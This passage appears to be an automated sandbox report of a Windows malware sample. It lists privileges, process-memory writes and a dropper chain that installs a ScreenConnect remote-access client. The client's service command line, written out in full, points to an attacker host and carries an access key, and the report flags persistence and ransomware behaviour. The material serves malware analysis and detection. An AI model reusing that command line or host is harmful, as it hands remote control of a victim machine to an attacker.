Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4320 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 4320 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 4320 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 3516 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 3516 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 3516 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 5064 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5064 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5064 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3516 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 3516 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 3516 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 4320 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 4320 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 4320 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 3228 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 3228 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 3228 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 3228 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
PID 3228 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
PID 3228 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
PID 3228 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
PID 3228 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
PID 3228 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
PID 4476 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe C:\Windows\SysWOW64\msiexec.exe
PID 4476 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe C:\Windows\SysWOW64\msiexec.exe
PID 4476 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe C:\Windows\SysWOW64\msiexec.exe
PID 524 wrote to memory of 3768 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 3768 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 3768 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3768 wrote to memory of 4064 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 3768 wrote to memory of 4064 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 3768 wrote to memory of 4064 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 3228 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
PID 3228 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
PID 524 wrote to memory of 3096 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 524 wrote to memory of 3096 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 524 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 32 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 32 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 32 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3088 wrote to memory of 992 N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
PID 3088 wrote to memory of 992 N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
PID 3088 wrote to memory of 3040 N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
PID 3088 wrote to memory of 3040 N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
PID 3228 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3228 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3228 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5052 -ip 5052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 960

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E3213FFB1A357C6A15C81E8620715731 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240677796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A4FEEDD031CC30D4F90BF1C26AE2F8CC

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A67D321E4B6058891C34D4762151165D E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=5e07fdea-2445-4cdf-b446-9468459e62fc&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "9a4b1c52-2179-481d-a289-7d44e903e96d" "User"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "b4abed41-d6fe-40e4-9266-e92554889e94" "System"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

